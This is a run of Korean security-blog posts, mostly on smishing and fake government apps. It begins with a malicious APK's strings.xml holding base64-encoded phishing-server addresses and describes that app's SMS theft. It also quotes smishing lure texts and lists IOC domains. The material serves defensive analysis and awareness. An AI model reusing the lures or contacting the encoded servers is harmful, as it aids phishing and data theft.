    <string name="mtrl_switch_thumb_path_checked">M4,16 A12,12 0 0,1 16,4 H16 A12,12 0 0,1 16,28 H16 A12,12 0 0,1 4,16</string>
    <string name="mtrl_switch_thumb_path_morphing">M0,16 A11,11 0 0,1 11,5 H21 A11,11 0 0,1 21,27 H11 A11,11 0 0,1 0,16</string>
    <string name="mtrl_switch_thumb_path_name">circle</string>
    <string name="mtrl_switch_thumb_path_pressed">M2,16 A14,14 0 0,1 16,2 H16 A14,14 0 0,1 16,30 H16 A14,14 0 0,1 2,16</string>
    <string name="mtrl_switch_thumb_path_unchecked">M8,16 A8,8 0 0,1 16,8 H16 A8,8 0 0,1 16,24 H16 A8,8 0 0,1 8,16</string>
    <string name="mtrl_switch_track_decoration_path">M1,16 A15,15 0 0,1 16,1 H36 A15,15 0 0,1 36,31 H16 A15,15 0 0,1 1,16</string>
    <string name="mtrl_switch_track_path">M0,16 A16,16 0 0,1 16,0 H36 A16,16 0 0,1 36,32 H16 A16,16 0 0,1 0,16</string>
    <string name="password_toggle_content_description">Show password</string>
    <string name="path_password_eye">M12,4.5C7,4.5 2.73,7.61 1,12c1.73,4.39 6,7.5 11,7.5s9.27,-3.11 11,-7.5c-1.73,-4.39 -6,-7.5 -11,-7.5zM12,17c-2.76,0 -5,-2.24 -5,-5s2.24,-5 5,-5 5,2.24 5,5 -2.24,5 -5,5zM12,9c-1.66,0 -3,1.34 -3,3s1.34,3 3,3 3,-1.34 3,-3 -1.34,-3 -3,-3z</string>
    <string name="path_password_eye_mask_strike_through">M2,4.27 L19.73,22 L22.27,19.46 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
    <string name="path_password_eye_mask_visible">M2,4.27 L2,4.27 L4.54,1.73 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
    <string name="path_password_strike_through">M3.27,4.27 L19.74,20.74</string>
    <string name="side_sheet_accessibility_pane_title">Side Sheet</string>
    <string name="url_down">UEREZWxNUnYtMjA5LjE0MS4zNi4yMA==</string>
</resources>

Android Permission

권한 (Permission)	설명 (Description)
android.permission.INTERNET	앱이 인터넷을 사용할 수 있도록 허용
android.permission.REQUEST_INSTALL_PACKAGES	앱이 외부 패키지를 설치할 수 있도록 허용
com.mpgd.pompbsys.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION	내부적으로 사용되는 동적 브로드캐스트 리시버 권한

코드 분석

앱 실행 시 피싱 화면을 보여주고 추가 APK파일을 다운로드 설치를 진행한다.
설치된 APK 파일도 피싱 사이트로 접속하며, 권한 흭득, 각종 정보수집과 설정을 확인하고 sms 수집 및 송신 기능이 포함되어 있다.

govkr.apk

피싱 화면
사용자 입력을 받아 서버로 전송
특정 경로에서 govManage.apk 다운로드하여 추가 설치를 합니다.
govManage.apk
- 피싱 화면을 보여줌
- 권한 획득
- 배터리 최적화, 네트워크 사용권환 확인, 진동 설정 확인
- 각종정보 수집 (번호, 통신사, 모델명)
- sms 수집
- 핸들러 메시지를 통해 특정 번호 확인 및 행위
- sms 송신

1. 앱 실행 시 피싱 사이트를 보여주고 사용자 입력 값을 서버로 전송

실행 시 피싱 페이지 접속

피싱 사이트 화면과 유출

실행 시 보여지는 피싱 페이지

입력 값 유출

base64로 디코딩 된 문자열에서 시그니처 키를 뺴면 피싱사이트 주소를 획득 할 수 있다.

<string name="decodeKey">PDDelMRv-</string>
<string name="baseUrl">UEREZWxNUnYtMjA5LjE0MS41My44MQ==</string
<string name="url_down">UEREZWxNUnYtMjA5LjE0MS4zNi4yMA==</string>

2. 특정 주소에서 APK 파일 설치

추가 다운로드

3. govManage.apk 피싱 사이트 화면을 보여줌

첫 번째 앱과 같은 유출지를 가짐

정보 유출지

피싱 사이트 접속 주소

4. 권한 획득

사용 권환을 가져옴1

사용 권환을 가져옴2

5. 배터리 최적화, 네트워크 사용권환 확인

베터리 최적화

네트워크 사용 권한 확인

전화 수신 시 진동 설정 확인

6. 각종정보 수집

번호, 통신사 수집

기기 모델명 수집

sms 수집

7. 핸들러 메시지를 통해 특정 번호 확인 및 행위

핸들러 메세지

특정 조건

특정 조건이 만족하면 send 메세지

정보 유출

정보 유출및 메세지 송신

8. sms 송신 기능

9. 유출에 사용되는 api

전화번호만 있는 경우 전화했을 때 앱 설치하라고 링크를 보내주는 건 거르시고 항상 직접 앱 스토어에 들어가서 설치하시기 바랍니다. 항상 앱 설치 하실 때는 신뢰 가능한 원스토어나 플레이스토어 등을 이용하시는 게 좋습니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중!

open.kakao.com

악성 파일인지 판단하는 체크리스트

카고형 — Sat, 1 Mar 2025 12:41:29 +0900

최근 악성 파일 사례

1. 교통법규 위반 고지서를 위장한 스미싱 공격

최근, "과속 운전 벌점 통지서"라는 메시지를 포함한 악성 링크가 포함된 문자 메시지가 사용자에게 전송되는 사례가 증가하고 있습니다. 해당 링크를 클릭하면 악성 파일이 다운로드되며, 이를 실행하면 금융 정보 탈취 등의 피해가 발생할 수 있습니다.

2. 가짜 이력서 및 계약서를 이용한 악성코드 유포

기업을 대상으로 한 스피어피싱 공격이 증가하고 있습니다. 공격자는 "입사지원서" 또는 "계약서"로 위장한 문서 파일을 이메일에 첨부해 발송하며, 사용자가 이를 열람하면 매크로 실행을 통해 악성코드가 설치됩니다.

3. 크립토 마이너 악성코드

최근에는 정식 소프트웨어로 위장한 크립토 마이너 악성코드가 발견되었습니다. 해당 악성 파일을 실행하면 사용자 모르게 PC 자원을 이용하여 가상화폐 채굴을 수행하며, 시스템 성능 저하 및 과부하를 유발할 수 있습니다.

[체크리스트]

1. 파일 정보 분석

✔ 파일 이름 및 확장자 확인 – .pdf.exe, .jpg.scr 같은 확장자 위장 여부 확인
이유: 일부 악성 파일은 정상적인 파일로 보이기 위해 확장자를 속이는 기술을 사용합니다.

HxD로 파일 시그니처를 확인

✔ 파일 크기 검사 – 정상적인 프로그램에 비해 지나치게 크거나 작은지 확인
이유: 일부 악성코드는 최소한의 크기로 제작되어 빠르게 실행되거나, 반대로 불필요한 데이터를 포함하여 분석을 회피할 수도 있습니다.

CFF Explor, 문서파일의 경우 OLEdump등 이용 이상여부 확인

✔ 디지털 서명 확인 – 신뢰할 수 있는 발급자의 서명이 있는지 (sigcheck 활용)
이유: 정상적인 소프트웨어는 보통 개발사에서 디지털 서명을 포함하여 무결성을 보장하지만, 악성코드는 서명이 없거나 위조된 경우가 많습니다.

✔ 파일 위치 확인 – Temp, AppData, System32 등에 위치하는지 검사
이유: 악성코드는 보통 시스템 폴더에 숨어 자동 실행되도록 설정됩니다.

✔ 타임스탬프 조작 여부 – 생성·수정 시간이 비정상적으로 변경되었는지 확인
이유: 악성코드는 분석을 회피하기 위해 파일 생성 시간을 조작하는 경우가 있습니다.

2. 정적 분석 (Static Analysis)

✔ 파일 해시 값 조회 (MD5, SHA256) – VirusTotal, Hybrid-Analysis 등에서 검사
이유: 이미 알려진 악성 파일과 동일한 해시 값을 가진다면 악성코드일 가능성이 높습니다.

✔ 패킹 여부 검사 (PEiD, Detect It Easy 활용)
이유: 악성코드는 분석을 피하기 위해 UPX, Themida, VMProtect 같은 패커를 사용하여 파일을 압축합니다.

✔ Imports 및 API 호출 확인 – 악성 API (CreateRemoteThread, VirtualAllocEx) 사용 여부
이유: 악성 파일은 보통 메모리 할당, 원격 코드 실행, 프로세스 Injection 등을 수행하는 API를 호출합니다.

✔ 문자열 검사 (strings, Floss 활용)
이유: 파일 내부 문자열에서 cmd.exe, Powershell, http:// 등이 포함되어 있다면 의심스러운 네트워크 연결이나 명령 실행 가능성이 있습니다.

✔ Embedded Resource 확인 – 숨겨진 바이너리, PE 파일, PowerShell 스크립트 포함 여부
이유: 일부 악성코드는 내부에 추가 악성 모듈을 포함하고 실행 시 자동으로 복호화 및 실행됩니다.

3. 동적 분석 (Dynamic Analysis)

✔ 프로세스 모니터링 (ProcMon, Process Explorer)
이유: 정상적인 프로그램과 다르게 악성코드는 실행 후 새로운 프로세스를 생성하거나, 기존 프로세스를 변조할 가능성이 높습니다.

✔ 네트워크 통신 확인 (Wireshark, Fiddler)
이유: 악성 파일이 C2 (Command & Control) 서버와 통신하는지 확인하여 데이터 탈취, 원격 명령 수신 여부 분석이 가능합니다.

✔ 파일/레지스트리 변경 여부 (RegShot, Autoruns)
이유: 악성코드는 지속성을 유지하기 위해 시스템 레지스트리를 수정하거나 특정 파일을 생성하는 경우가 많습니다.

✔ 메모리 내 행위 분석 (Process Hacker, Volatility)
이유: 일부 악성 파일은 실행 시 메모리에만 존재하며, 디스크에 흔적을 남기지 않으므로 메모리 분석이 중요합니다.

✔ 권한 상승 여부 (Windows Event Logs 확인)
이유: UAC 우회 및 관리자 권한 요청을 시도하는지 확인하여 시스템 권한 장악 여부 분석이 가능합니다.

4. 최종 판단 기준

✅ 멀웨어 패턴과 일치하는가?
✅ 비정상적인 행위를 수행하는가?
✅ 네트워크 통신이 이상한가?
✅ 정상적인 소프트웨어와 차이점이 있는가?

결론: 왜 악성 파일 분석이 중요한가?

1️⃣ 개인정보 유출 방지 – 악성코드가 계정 정보, 신용카드 정보를 탈취할 수 있음
2️⃣ 랜섬웨어 감염 예방 – 실행 후 파일을 암호화하고 금전을 요구하는 경우가 많음
3️⃣ 백도어 및 원격 제어 차단 – 공격자가 원격으로 PC를 조작할 가능성이 있음
4️⃣ 기업 및 기관 보안 유지 – APT 공격(지능형 지속 위협) 방어를 위해 필요
5️⃣ 정상 프로그램과 악성코드를 구별하여 피해 최소화

분석 도구 추천

의심스러운 파일이 있을 경우, 다음과 같은 분석 도구를 활용하면 효과적으로 악성 여부를 판단할 수 있습니다.

VirusTotal: 여러 백신 엔진을 사용해 파일 및 URL을 검사할 수 있습니다.
Any.Run: 동적 분석이 가능한 온라인 샌드박스로, 악성 코드의 실행 흐름을 확인할 수 있습니다.
Hybrid Analysis: 정적 및 동적 분석 기능을 제공하여 파일의 악성 여부를 종합적으로 판단할 수 있습니다.
PE Studio: 실행 파일의 기본적인 정적 정보를 분석하는 도구입니다.
Wireshark: 네트워크 트래픽을 분석하여 악성 코드의 통신 여부를 확인할 수 있습니다.
Process Monitor (ProcMon): 실시간으로 파일, 레지스트리, 프로세스 활동을 추적할 수 있는 도구입니다.
Autoruns: 자동 실행되는 프로세스를 분석하여 악성 코드 여부를 확인할 수 있습니다.

경찰청 교통민원 스미싱 증가! 피싱 사이트 유포 (25.02.25)

카고형 — Tue, 25 Feb 2025 23:16:27 +0900

최근 들어 스미싱 공격이 다시 운전자 대상으로 확산되고 있습니다. 2022년에는 교통위반 관련, 2023~2024년에는 생활형 범법행위(쓰레기 무단투기 등) 중심으로 스미싱이 유포되었으나, 최근에는 다시 교통위반 범칙금 및 과태료 관련 피싱이 증가하는 추세입니다.

특히, 정부24·교통민원24(이파인) 등의 공식 기관을 사칭한 스미싱 문자가 기승을 부리고 있으며, 피싱 사이트를 통해 악성 앱이 유포되고 있습니다.

2023~2024년: 생활 범법행위(무단투기, 환경 관련) 위주
2024년 최신: 교통위반, 벌점, 범칙금, 과태료 등 운전자 대상 공격 재확산

정부24(구 민원24) 사칭 스미싱 피싱 사이트(23.11.09)

경찰청교통민원24 사칭 스미싱 피싱 사이트 (23.09.11)

교통민원24(이파인) 사칭 피싱 사이트(22.11.06)

이전 문구 키워드

[민원24]쓰레기 무단투기로 단속되어 과태료 부과되였습니다. 과태료확인: URL

[Web발신] [교통민원24] 끼어들기 금지 위반 : 처벌 결과 전송 완료

[web발신]
[교 통24(이파인)]교 통위반
벌점처분고지서 발송완료 hxxp://URL

[web발신][182교통(이파인)]과속운전자동차범칙벌점통지서 hxxp://URL
 
[Web발신]운전 중 전조등 미점등 벌점 고지서 발송완료 http://URL

[교통24(이파인)]차량이 중심선을 위반하다.처벌 결과 발송 완료 http://URL

[Web발신]차량위반운전처벌통지서 http://URL
 
[Web발신] 신호등 위반 운행 처벌통지서 http://URL

스미싱 문구

[국외발신]
{-경찰청교통민원-}
교통법위반(사전안내서)발부됨 확인바람: http://URL

정부24 관련 현재 배포되고 있는 스미싱 문구는 "교통법규위반(사전안내서)발부됨" 내용이 포함되어 스미싱 문자를 배포하고 있습니다.

정부 24(구 민원 24) 사칭을 하여 최근에는 쓰레기, 무단투기등 생활 범법행위 위주의 문구를 사용 한것으로 알고 있었는데

최근에 다시 운전자관련 하여 범칙금, 범법 행위 관련으로 배포 되는것으로 보아 "과태료", "범칙금", "운전 면허", "고지서", "통지서", "벌점", "신호 위반", "과속", "불법 주정차", "불법 유턴", "보행자 보호 의무 위반"등 이 포함된 문구가 다시 배포 될것으로 생각됩니다.

피싱 사이트 접속 시 해당 페이지는 "피싱 사이트 버튼 클릭 - 악성앱 설치" 순으로 진행되고, 피싱 사이트에서는 정상 사이트처럼 사용자를 속여 개인정보 수집을 진행하고 마지막에는 악성앱 설치를 유도하기 때문에 주의하셔야 합니다.

정상 배포 방식

정부에서 앱 다운로드 하는 경우는 특이사항이 아닌 이상 요구 하지 않을 것으로 생각됩니다.
정부24·이파인 등 공공기관 사칭 문자에 속지 않도록 하고, 출처 불명의 앱 설치를 절대 피하세요.

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

이전의 피싱 사이트는 번호 입력 - 본인인증 - 앱 다운 순으로 진행됬었는데 요번에는 번호 입력, 본인인증이 없이 피싱 페이지에서 버튼을 누르면 다운로드 되는 형태로 바뀌었습니다.

해당 피싱 사이트는 사칭 사이트인 정부24 홈페이지와는 이전 처럼 비슷 하지는 않아 보입니다.

해당 스미싱 문자에 포함된 URL 주소로 접속하면 정부 24(구 민원24) 사칭 피싱 사이트로 접속하게 되며 해당 페이지에서 "정부24 어플 다운로드" 버튼을 클릭하면 APK 파일을 설치하게 되며, 해당 앱은 악성 앱입니다.

휴대전화 보안 그리고 악성 앱 제거 방법

https://open.kakao.com/o/sy8rOtNf

cago_note님의 오픈프로필

cago_note 블로그 운영중! https://cago-young.tistory.com

open.kakao.com

Python 실행 파일로 변환하기

카고형 — Thu, 23 Jan 2025 04:56:01 +0900

1. 소개

PyInstaller란 무엇인가?
Python을 실행 파일로 변환하는 방법
Python 스크립트를 실행 파일(EXE)로 만드는 이유.
주요 사용 사례 (독립 실행 가능한 프로그램 배포, Python 설치 없이 실행 등).

2. 설치 방법

PyInstaller 설치 명령어:

pip install pyinstaller

3. 기본 사용법

단일 파일 EXE 생성
실행 결과 및 디렉토리 구조 설명 (예: dist/, build/ 등).

pyinstaller --onefile your_script.py

4. 유용한 옵션

콘솔 창 제거:

pyinstaller --onefile --noconsole your_script.py

아이콘 지정:

pyinstaller --onefile --icon=app_icon.ico your_script.py

추가 데이터 포함:

pyinstaller --onefile --add-data "data_file.txt;." your_script.py

5. 고급 사용법

다중 파일 프로그램의 리소스 포함.
UPX를 사용한 EXE 크기 최적화.
크로스 플랫폼 지원(예: Windows에서 Linux 실행 파일 생성).

6. 문제 해결

공통 에러 및 해결 방법.
- ModuleNotFoundError 문제 해결.
- EXE 실행 시 누락된 DLL 문제

7. 마무리

PyInstaller의 장점과 한계점.
기타 대안 도구(예: py2exe, cx_Freeze).

핸드폰(모바일)에서 크롬 개발자 모드 사용법

카고형 — Tue, 14 Jan 2025 06:37:02 +0900

핸드폰(모바일)에서 크롬 개발자 모드 사용법

TL;DR: 모바일 기기 Chrome 웹·앱(WebView) 디버깅을 PC 크롬 chrome://inspect로 연결하고, 인식 문제 해결 방법까지 정리했습니다.

모바일에서 크롬( Chrome ) 개발자 모드 사용법

모바일기기(핸드폰)에서 Chrome 브라우저나 앱 내 WebView 디버깅이 필요할 때나 크롬 개발자모드가 필요한 경우 사용할 수 있는 도구가 바로 Chrome의 chrome://inspect입니다. 이 포스팅에서는 chrome://inspect의 주요 기능과 사용법에 대해 설명합니다.

1. chrome://inspect

chrome://inspect는 Chrome 브라우저에 내장된 디버깅 도구로, 모바일 디바이스에서 실행 중인 웹페이지나 앱의 WebView를 PC에서 디버깅할 수 있도록 지원합니다. 주로 다음과 같은 용도로 사용됩니다:

모바일 웹 디버깅: 모바일 Chrome에서 실행 중인 웹페이지를 디버깅.

WebView 디버깅: Android 애플리케이션 내부에서 실행되는 WebView 콘텐츠 디버깅.

원격 디버깅: 같은 네트워크 상의 다른 PC나 디바이스의 Chrome 탭 디버깅.

2. chrome://inspect 사용법

PC 측 Chrome 브라우저 준비

검색창에 chrome://inspect 입력

모바일 측 준비

모바일 디바이스에서 설정-시스템-태블릿정보-빌드번호 연타를 해서 Android 디바이스에서 개발자 옵션을 활성화
시스템- 개발자 옵션- USB 디버깅을 허용합니다.

"Devices" 섹션에 연결된 디바이스가 표시되며, 디버깅 가능한 페이지 목록이 나타납니다.
디바이스가 표시되면 모바일에서 웹 접속을 하면 버튼이 나옵니다.

.모바일에서 웹 접속을 하게 되면 아래처럼 inspect 버튼이 나오는걸 확인 가능햅니다.

디버깅할 페이지 옆의 "Inspect" 버튼을 클릭하면 크롬 개발자 도구가 열리고, 모바일 웹 페이지를 디버깅을 시작할 수 있습니다.

3. 주요 기능 설명

1) 모바일 디바이스 디버깅

chrome://inspect의 가장 대표적인 기능으로, 모바일 디바이스에서 실행 중인 웹페이지의 DOM, 스타일, 네트워크 요청, 콘솔 로그 등을 실시간으로 확인하고 수정할 수 있습니다.

DOM 구조 확인 및 수정: 모바일 페이지의 DOM 구조를 PC에서 확인하고 실시간으로 수정할 수 있습니다.

네트워크 요청 모니터링: 모바일에서 발생하는 네트워크 요청과 응답을 PC에서 쉽게 추적할 수 있습니다.

2) WebView 디버깅

Android 애플리케이션 내부에서 실행되는 WebView 콘텐츠도 디버깅할 수 있습니다.

요구 사항: 앱이 WebView 디버깅을 지원하려면 다음과 같이 setWebContentsDebuggingEnabled(true) 메서드를 호출해야 합니다.

if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {
    WebView.setWebContentsDebuggingEnabled(true);
}

WebView 디버깅이 가능해지면, PC의 Chrome에서 해당 WebView 콘텐츠를 확인할 수 있습니다.

3) 원격 Chrome 탭 디버깅

같은 네트워크에 연결된 다른 PC나 디바이스에서 실행 중인 Chrome 탭을 디버깅할 수 있습니다.

요구 사항: 원격 디바이스에서 Chrome을 실행한 후, 디버깅 옵션을 활성화해야 합니다.

디버깅할 탭을 선택하면 PC에서 해당 탭의 내용을 실시간으로 디버깅할 수 있습니다.

팁 & 트러블슈팅

1) 디바이스가 인식되지 않을 때

USB 디버깅 활성화 여부 확인: Android 디바이스의 "개발자 옵션"에서 "USB 디버깅"이 활성화되어 있는지 확인합니다.
드라이버 설치: Windows PC의 경우 Android USB 드라이버가 제대로 설치되어 있는지 확인합니다.

2) 디바이스가 연결되었으나 페이지가 표시되지 않을 때

Chrome 버전 확인: PC와 모바일 디바이스 모두 최신 버전의 Chrome을 사용하고 있는지 확인합니다.
USB 케이블 교체: 일부 USB 케이블은 데이터 전송을 지원하지 않으므로, 반드시 데이터 전송이 가능한 케이블을 사용해야 합니다.

3) 네트워크 연결 문제

원격 디버깅 시 같은 네트워크에 연결되어 있어야 합니다.
방화벽 설정이 원격 연결을 차단하고 있지는 않은지 확인합니다.

베트남 거점 모바일 스미싱 조직 검거, 피해 사건 전말

카고형 — Sat, 21 Sep 2024 21:43:30 +0900

지난 20일 최근 경찰청이 베트남에서 활동하는 대규모 모바일 스미싱 조직을 베트남 공안과 협력해 검거하고, 핵심 조직원들을 국내로 송환한 사건이 발생했습니다. 피해 규모는 100억 원에 달하며, 이는 국내에서 역대 최대 피해를 낳은 모바일 스미싱 사건으로 기록되었습니다.

부고장, 청첩장 사칭 피싱 사이트

사건 개요

수사 시작

2023년 7월, 경북경찰청 사이버범죄수사대가 청첩장 사기 피해 신고를 접수한 후 본격 수사 착수.

범죄 수법:

청첩장, 부고장, 택배 문자를 통해 피싱 사이트에 접속 하게하여 악성 프로그램을 설치하고, 피해자의 금융정보를 탈취.
지난 23년 해당 조직이 사용 했을 것으로 추정되는 피싱 사이트, 악성 앱

지인(부고장) 사칭 피싱 사이트 (23.08.19)

[악성 앱] 모바일 부고장 사칭 악성앱 분석 (23.08.20)

재혼 관련 청첩장 사칭 피싱 사이트(23.01.28)

피해 규모

총 230명의 피해자와 100억 원의 피해액.

조직 검거 과정

경찰청은 수사 팀은 송금받은 가상계좌, 법인 계좌의 거래내용 분석을 통해 조직원 베트남 2명을 검거, 1명을 구속하고 그 이후에 집중적인 수사와 베트남 공안과 긴밀한 협조를 통해 조직원 7명을 검거했고, 총책을 포함해 6명을 국내로 송환. 경찰의 집요한 계좌 분석으로 약 30만 건의 거래 내역을 추적, 조직원을 특정하여 잡은것으로 보입니다.

결론 및 전망

이번 사건은 국제 공조와 사이버 범죄 수사의 모범 사례로, 앞으로도 악성 범죄 조직에 대해 강력한 대응이 필요하다는 점을 시사합니다. 해당 조직이 잡혔다고 하지만 해당 조직 외에 추가로 부고장, 청첩장등을 이용해서 범죄를 저지를 수 있기 때문에 항상 스미싱 문자 공격에 주의를 해야 될 것 같습니다.

https://www.chosun.com/national/national_general/2024/09/20/YXVHGYBBA5EFLOSLGOACPUTAWM/

베트남 거점 100억대 모바일 스미싱 범죄조직...경찰에 무더기 검거

베트남 거점 100억대 모바일 스미싱 범죄조직...경찰에 무더기 검거 총책 등 7명 검거해 6명 송환 부고·택배 문자 등 피해액 역대 최대

www.chosun.com

https://www.chosun.com/national/national_general/2024/01/30/BMKYYEF7UFFSBNYDMR3YU5GCUY/

“모친 별세” 날아온 부고장… 한달 560억 털어간 이 수법

모친 별세 날아온 부고장 한달 560억 털어간 이 수법

www.chosun.com

https://www.boannews.com/media/view.asp?idx=132959&page=1&kind=1

경찰청, 베트남 거점 최대 스미싱 범죄조직 총책 및 핵심 인물 7명 검거

경찰청(청장 조지호)은 베트남에서 사무실을 차려 국내 조직원들과 함께 모바일 스미싱 범행을 해온 해외 조직원 7명을 베트남 공안과의 공조수사를 통해 검거하고, 총책 등 3명을 9월 14일에 인

www.boannews.com

[피싱] 계정 탈취를 노리는 텔레그램 피싱 사이트 주의

카고형 — Sat, 21 Sep 2024 20:52:59 +0900

최근 계정정보 탈취 목적으로 스미싱 공격을 많이 보이는거 같습니다. 저도 문자를 최근에 받았었습니다. 텔레그램 사칭으로 한 피싱 페이지였는데요. 찾아보니 한국인터넷진흥원(kisa)에서도 주의가 필요한지 "SNS 소셜커머스등 계정 탈취를 노리는 스미싱 주의 권고"란 제목으로 보안 공지가 올라왔습니다. 해당 내용은 정부 공고와 해당 내용에 나오는 텔레그렘(telegram) 피싱 관련해서 글을 작성 해 봤습니다.

주요 내용

텔레그램(telegram), 애플(apple), 소셜커머스 사이트 등 플랫폼의 계정 자격 증명을 도용하려는 스미싱 시도가 증가하고 있다고 경고했습니다. 공격자는 SMS 메시지에 피싱 링크를 보내 사용자가 민감한 정보를 입력하도록 속입니다. 이러한 도난당한 자격 증명은 무단 구매나 암호화폐 도난과 같은 금융 사기에 악용됩니다. 사용자는 의심스러운 메시지와 URL에 주의하고, 스미싱 시도를 신고하고, 강력한 비밀번호와 이중 인증으로 계정을 보호해야 합니다.

아래는 주의해야 하는 계정 탈취 관련 스미싱

한국인터넷진흥원 자료

대응 방안

스마트폰 내 문자 수신화면에서 "스팸으로 신고"
보이스피싱통합신고대응센터 내 '스미싱 문자메세지 차단 신고하기' 112
보호나라(카카오톡 채널) 내 '스미싱' 확인서비스를 이용하여 신고

정부에서 2차 피해를 막기 위해 ISP 차단등을 하기 때문에 귀찮더라도 신고해 주시면 2차 피해를 최소한 막을 수 있습니다.

스미싱 문구

[국외발신] [Telegram] 사용자 인증을 완료해주세요 미인증시 계정이 만료됩니다. hxxps"//URL

이상하다고 느끼는 점

해당 문자의 링크를 보면 먼저 정상 주소와 다른 것을 확인할 수 있습니다. 정상주소는telegram.org입니다.
- 텔레그램 단축 URL(t.me)을 왜 사용 안 했지?
- 서브 도메인에 telegram이고 메인 도메인은 ins-kr >> 도메인 국가 확인해 보니 CN으로 확인됨

피싱 사이트 접속 화면

해당 URL에 접속하게 되면 로그인하는 방법이나 로그인 창을 보여주고 계정정보를 입력하도록 유도한다. 뿐만 아니라 2차 인증(sns 인증)까지 입력을 유도하여 탈취하는 것으로 확인되었습니다.

텔레그램 스미싱 문자의 링크를 접속하게 되면 로그인 페이지가 보이고 사용자 계정정보와 sns 로그인 코드를 탈취한다. 2차 인증(세션등)까지 탈취하여 공격자의 서버로 전송되어 계정 탈취가 진행되기 때문에 각별한 주의가 필요해 보입니다. 실제로 탈취되면 다른국가 기기에서 로그인되는것을 확인 할 수 있었습니다.

IOC

telegram[.]ins-kr[.]com
admin[.]leymocci[.]com

[몸캠피싱] 레드톡 피싱 사이트 주의 (24.09.19)

카고형 — Thu, 19 Sep 2024 13:12:50 +0900

해당 피싱사이트는 "레드톡"이라는 이름으로 피싱 사이트를 만들어 피해자에게 버튼클릭 유도 하여 앱 설치를 진행 하는 피싱 사이트이다. 채팅, 비밀 사진첩, 공유 저장소, 등의 사칭은 대부분 몸캠피싱에서 많이 사용 하는 형태이다.

몸캠피싱

몸캠피싱 피해과정은 SNS로 친구요청이나 데이팅 앱 등 친밀감을 쌓고 음란채팅으로 유도하여 피해자의 신체사진 및 영상 등을 확보하고 채팅 중에 음성이 안 들린다 또는 비밀성을 강조하며 악성 앱(음성 채팅, 갤러리, 클라우드, 보안) 설치 유도를 해서 모바일에 저장된 주소록(연락처) 정보를 빼거나 SNS를 통해 피해자의 지인에게 연락 가능한 정보를 수집한다. 수집한 정보를 이용하여 유포한다며 협박을 해서 금전을 요구하는 형태이다.

피해과정

채팅 앱 및 SNS -> 친밀감 형성 -> 피해자 욕구 충족(기프티콘, 금전, 성욕 등) -> 영상 및 사진 요구 -> 지인 연락처 확보(악성 앱 설치) -> 협박 및 금전요구

피싱 사이트 접속 화면

해당 피싱 사이트는 악성 앱설치 페이지가 바로 보이는게 되는데 이는 이전에 다른 페이지가 있을 것으로 생각 됩니다.

[악성 앱] 원클라우드 악성앱 분석 (24.06.19) 와 유사한 형태로 배포 되고 있습니다.

userAgent 정보를 확인해 특정 OS와 브라우저로 접속하게끔 페이지를 구성한것으로 확인됩니다.

agent 정보를 safari 와 Ios를 사용하면 설치 버튼이 보여지고, 최종적 IOS 앱 파일을 다운 받을 수 있습니다.

프로토콜을 보면 웹사이트를 이용하여 Apple 플랫폼에서 기업내부 전용앱 배포 하는 방식으로 악성앱을 설치하게 됩니다. 또한 기기에서 신뢰할 수 있는 인증서를 필요하기 때문에 인증서도 다운받을 수있습니다. 해당 방식은 앱 스토어에서 검증 하지 않기 때문에 상당히 위험 합니다.

애플 플랫폼에서 배포 방식

.ipa 파일 배포: 악성 앱은 .ipa 포맷으로 되어 있으며, XML 매니페스트 파일과 함께 HTTPS 기반 웹 사이트에서 다운로드됩니다.
매니페스트 파일: 해당 파일은 악성 앱 설치를 트리거하며, 사용자가 웹 페이지에서 앱을 다운로드할 수 있도록 안내합니다.
인증서 요구: 기기에서 신뢰할 수 있는 인증서로 서명된 앱만 설치가 가능하며, Apple의 OCSP 서버에서 인증서의 유효성을 검증합니다.

다운 받은 매니페스트 파일인 .plist 파일을 보면 다운 받는 주소를 확인 가능합니다. 해당 주소로 들어가면 ipa 앱파일을 다운 받게 됩니다.

아이폰도 안드로이드처럼 피해를 방지하기 위해서는, 의심스러운 링크나 앱 설치 유도를 받았을 때 신뢰할 수 있는 출처가 아닌 경우 절대 설치하지 않도록 주의해야 합니다.

[피싱] 스타벅스 채용 사기 주의 (24.07.05)

카고형 — Fri, 5 Jul 2024 21:16:34 +0900

스타벅스를 사칭한 홈페이지, 문자 메시지, 이메일, 카카오톡 채팅 등을 통해 개인 정보를 탈취하거나 금전적 피해를 입히는 사례가 빈번히 발생하고 있습니다. 이에 따라, 본 포스트에서는 이러한 사기 유형 대해 알아보겠습니다.

스타벅스 커피 코리아는 의심스러운 메시지나 웹사이트에 주의할 것을 당부드립니다. 자세한 정보는 아래에 있는 스타벅스 커피 코리아 공지사항에서 확인할 수 있습니다.

https://www.starbucks.co.kr/whats_new/noticeView.do?seq=5520

스타벅스 커피 코리아

www.starbucks.co.kr

스타벅스 사칭 채용 사기의 유형

1) 피싱 페이지

사기꾼들은 실제 스타벅스 홈페이지와 유사하게 만든 가짜 사이트를 통해 구직자들을 속입니다. 이 사이트에서 개인정보를 입력하게 하여 이를 탈취하는 방식입니다.

2) 문자(스미싱) 메시지

스타벅스를 사칭한 문자 메시지를 보내 특정 링크를 클릭하도록 유도합니다. 이 링크를 클릭하면 가짜 채용 사이트로 연결되거나 악성 코드가 설치될 수 있습니다.
- 예시 )
  
  (주) 스타벅스
  알바모집 일18만 지급 *신청접수* 재택근무 홈페이지접수: URL

자료 출처 : https://x.com/lollinseGong

3) 이메일

공식적인 이메일 주소와 유사한 이메일을 통해 채용 정보를 전달하고, 첨부 파일이나 링크를 클릭하도록 유도합니다. 이 과정에서 피싱 사이트로 연결되거나 악성 코드가 포함된 파일이 다운로드될 수 있습니다.

4) 카카오톡 채팅

카카오톡에서 스타벅스 로고와 이름을 도용한 계정을 통해 채용 정보를 제공하고, 채용 담당자인척 하며 링크를 클릭하게 하여 가짜 사이트로 유도하거나 추가적인 사기 행위를 할 수 있습니다.

사기 수법 특징

1) 과도한 혜택 제공

고액 연봉, 짧은 근무 시간 등 과도한 혜택을 제시하며 구직자들을 유혹합니다.

2) 빠른 입사 절차

일반적인 채용 절차보다 매우 빠른 입사 절차를 제안하여 의심할 시간을 줄입니다.

3) 개인 정보 요구

